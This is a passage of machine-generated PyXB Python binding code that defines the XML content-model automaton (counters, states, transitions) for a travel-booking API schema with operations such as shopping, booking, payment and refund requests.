cc_20 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12))
counters.add(cc_20)
cc_21 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12))
counters.add(cc_21)
cc_22 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12))
counters.add(cc_22)
cc_23 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12))
counters.add(cc_23)
cc_24 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12))
counters.add(cc_24)
cc_25 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12))
counters.add(cc_25)
cc_26 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12))
counters.add(cc_26)
cc_27 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12))
counters.add(cc_27)
cc_28 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12))
counters.add(cc_28)
cc_29 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12))
counters.add(cc_29)
cc_30 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12))
counters.add(cc_30)
cc_31 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12))
counters.add(cc_31)
cc_32 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12))
counters.add(cc_32)
cc_33 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12))
counters.add(cc_33)
cc_34 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12))
counters.add(cc_34)
cc_35 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12))
counters.add(cc_35)
cc_36 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12))
counters.add(cc_36)
cc_37 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12))
counters.add(cc_37)
cc_38 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12))
counters.add(cc_38)
cc_39 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12))
counters.add(cc_39)
cc_40 = fac.CounterCondition(min=0, max=None, metadata=pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 73, 12))
counters.add(cc_40)
states = []
final_update = set()
final_update.add(fac.UpdateInstruction(cc_0, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12))
st_0 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_0)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_1, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12))
st_1 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_1)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_2, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'travelPassShoppingRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12))
st_2 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_2)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_3, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'travelPassShoppingResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12))
st_3 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_3)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_4, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'scheduleSearchRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12))
st_4 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_4)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_5, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'scheduleSearchResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12))
st_5 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_5)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_6, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'addPaymentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12))
st_6 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_6)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_7, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'addPaymentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12))
st_7 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_7)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_8, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'authenticatePayerRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12))
st_8 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_8)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_9, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'authenticatePayerResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12))
st_9 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_9)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_10, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12))
st_10 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_10)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_11, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12))
st_11 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_11)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_12, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'claimValueDocumentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12))
st_12 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_12)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_13, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'claimValueDocumentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12))
st_13 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_13)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_14, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12))
st_14 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_14)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_15, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12))
st_15 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_15)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_16, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'createBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12))
st_16 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_16)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_17, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'createBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12))
st_17 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_17)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_18, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12))
st_18 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_18)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_19, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12))
st_19 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_19)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_20, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12))
st_20 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_20)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_21, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12))
st_21 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_21)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_22, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12))
st_22 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_22)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_23, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12))
st_23 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_23)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_24, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'returnValueDocumentRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12))
st_24 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_24)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_25, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'returnValueDocumentResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12))
st_25 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_25)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_26, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12))
st_26 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_26)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_27, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12))
st_27 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_27)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_28, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'updateBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12))
st_28 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_28)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_29, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'updateBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12))
st_29 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_29)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_30, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'refundBookingRecordRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12))
st_30 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_30)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_31, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'refundBookingRecordResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12))
st_31 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_31)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_32, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12))
st_32 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_32)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_33, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12))
st_33 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_33)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_34, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12))
st_34 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_34)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_35, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12))
st_35 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_35)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_36, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 69, 12))
st_36 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_36)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_37, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'deletePaymentTokenResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 70, 12))
st_37 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_37)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_38, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryRequest')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 71, 12))
st_38 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_38)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_39, False))
symbol = pyxb.binding.content.ElementUse(Body_._UseForTag(pyxb.namespace.ExpandedName(None, 'retrieveCancellationSummaryResponse')), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 72, 12))
st_39 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_39)
final_update = set()
final_update.add(fac.UpdateInstruction(cc_40, False))
symbol = pyxb.binding.content.WildcardUse(pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=pyxb.binding.content.Wildcard.NC_any), pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 73, 12))
st_40 = fac.State(symbol, is_initial=True, final_update=final_update, is_unordered_catenation=False)
states.append(st_40)
transitions = []
transitions.append(fac.Transition(st_0, [
fac.UpdateInstruction(cc_0, True) ]))
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_0, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_0, False) ]))
st_0._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_1, [
fac.UpdateInstruction(cc_1, True) ]))
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_25, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_26, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_27, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_28, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_29, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_30, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_31, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_32, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_33, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_34, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_35, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_36, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_37, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_38, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_39, [
fac.UpdateInstruction(cc_1, False) ]))
transitions.append(fac.Transition(st_40, [
fac.UpdateInstruction(cc_1, False) ]))
st_1._set_transitionSet(transitions)
transitions = []
transitions.append(fac.Transition(st_2, [
fac.UpdateInstruction(cc_2, True) ]))
transitions.append(fac.Transition(st_3, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_4, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_5, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_6, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_7, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_8, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_9, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_10, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_11, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_12, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_13, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_14, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_15, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_16, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_17, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_18, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_19, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_20, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_21, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_22, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_23, [
fac.UpdateInstruction(cc_2, False) ]))
transitions.append(fac.Transition(st_24, [
fac.UpdateInstruction(cc_2, False) ]))
